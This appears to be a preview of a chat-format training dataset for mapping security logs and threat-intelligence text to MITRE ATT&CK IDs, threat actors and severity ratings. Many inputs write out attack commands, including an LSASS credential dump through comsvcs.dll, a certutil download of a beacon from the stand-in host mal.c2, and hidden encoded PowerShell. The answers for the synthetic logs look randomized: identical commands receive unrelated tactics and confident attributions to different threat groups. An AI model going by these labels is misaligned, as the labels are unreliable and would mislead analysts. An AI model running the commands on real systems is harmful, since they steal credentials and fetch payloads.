messages listlengths 2 2 |
|---|
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2142 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.4.212.138",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0008\"], \"techniques... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for file creation and files transferred into the network",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3690 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.134.19.192",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0004\"]... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Disable the RDP service if it is unnecessary.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1563.002\", \"T1021.001\", \"T1021\", \"T1563\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-K31HRS65EW)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severity\": \"Cri... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\": \"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: overwrite or delete MBR in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Persistence Once started, the Keydnap backdoor installs a plist file in /Library/LaunchAgents/ if it has root privileges or $USER/Library/LaunchAgents/ otherwise to achieve persistence across reboots",
"role": "u... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1058 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.104.53.102",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techn... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.119.243.7",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\", \"TA0008\"], \"technique... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-Y4PJ6U3P4U)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance",
"role": "user"
},
{
"content": "{\"severit... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hig... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-ZE9RT6XN0Q)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Persistence, Defense Evasion",
"role": "user"
},
{
"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-OXG8DD43VE)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Credential Access, Persistence",
"role": "use... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Enable the UpdateFolderPermissions action for all logon types.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098.002\", \"T1098\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-QYF6XOUWDC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Impact",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2096 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.77.253.68",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0004\", \"TA0010\"], \"te... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-RD5M0GYBO9)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Lateral Movement",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.186.240.16",
"role": "user"
},
{
"content": "{\"tactics\": [\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains.",
"role": "u... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CARROTBAT has the ability to delete downloaded files from a compromised host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role": "assistant"
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: NotPetya drops PsExec with the filename dllhost.dat.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Okrum has used a custom implementation of AES encryption to encrypt collected data.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560.003\", \"T1560\"]}",
"role": "assis... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.187.174.204",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0002\"], \"techniq... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-LKLP44K7OM)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Credential Access",
"role": "user"
},
{
"content... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: It can also use GetDriveType to determine if a new drive is a CD-ROM drive.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-AENS0LH31R)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Impact, Discovery",
"role": "user"
},
{
"content... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-22JO9XQOS0)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Critical... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"co... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2902 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.123.141.1",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\",... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.146.35.190",
"role": "user"
},
{
"content": "{\"tactics\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-5YVBIY7JHA)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Exfiltration",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2612 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-IDRCXNBKZ4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Discovery, Lateral Movement",
"role": "user"
},
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes.",
"role": "user"
},
{
"content": "{\"tactics\": [\"T... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-E4AGP2DNSN)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance, Collection",
"role": "user"
},
{
"content": "{\"seve... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3380 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.134.98.155",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0010\", \"TA0005\"], ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3391 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.100.94.98",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1071.001... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Examples of cloud storage services include Dropbox and Google Docs.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1567.002\", \"T1567\"]}",
"role": "assistant"
}
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2992 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.141.203.79",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Patchwork has used BITS jobs to download malicious payloads.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techniques\": [\"T1197\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage Patch System Image due to the monolithic nature of the architecture.",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 713 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.62.99.61",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0011\"], \"techniques\": [\... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.62.28.85",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", ... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\", \"T1137.004\"]}",
"role": ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.97.105.106",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0004\"], \"techniques\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1276 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Rancor has used cmd.exe to execute commmands.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1137 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: lists the running processes",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3383 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.14.235.244",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0001\"], ... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 641 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.56.50.203",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0005\"], \"techniques\": [\"T1... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2941 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SysUpdate can delete its configuration file from the targeted system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-NQSW27BJSG)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Exfiltration",
"role": "user"
},
{
"conten... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-GE0ERAC8SS)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Exfiltration",
"role": "user"
},
{
"content": "{\"sev... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-YW42K225A1)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Critical\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-RR0Z2W59FI)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Reconnaissance",
"role": "user"
},
{
"content": "{\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1295 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confiden... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FELIXROOT executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005\", \"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\", \"T1137.... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\"... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3068 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.123.178.67",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"]... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 910 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confide... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: GravityRAT uses the netstat command to find open ports on the victim’s machine.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.53.78.84",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-INPZIKP4QW)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"Ext... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.64.195.213",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0005\"], \"techniques\": [\"T1566.00... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3934 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"c... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: All of the backdoors identified - excluding RoyalDNS - required APT15 to create batch scripts in order to install its persistence mechanism",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for the usage of unexpected or unusual cookies to access resources and services.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1606\", \"T1606.001\"]}",
"role": "assistant"
... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.003\", \"T1036\"]}",
"role": "assistant... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.149.221.199",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\", \"TA0007\"], \"tec... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor newly executed processes, such as eventvwr.exe and sdclt.exe, that may bypass UAC mechanisms to elevate process privileges on system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA000... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.16.175.91",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniqu... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2451 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.56.87.168",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"techniques... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor executed commands and arguments that may acquire credentials from web browsers by reading files specific to the target browser.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: [random_name].plist in the /Library/LaunchDaemons folder with the RunAtLoad and KeepAlive keys set to true.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.004... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spid... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.182.172.82",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\", \"TA0011\", \"TA0005\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"co... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.190.133.62",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218.005\", \"T1218\"]}",
"role": "assistant"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-QCI1A9RLLV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Defense Evasion, Collection",
"role": "user"
},
{
"conten... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.171.208.57",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-60HEVTS0PU)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Discovery",
"role": "user"
},
{
"content": "{\"severi... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.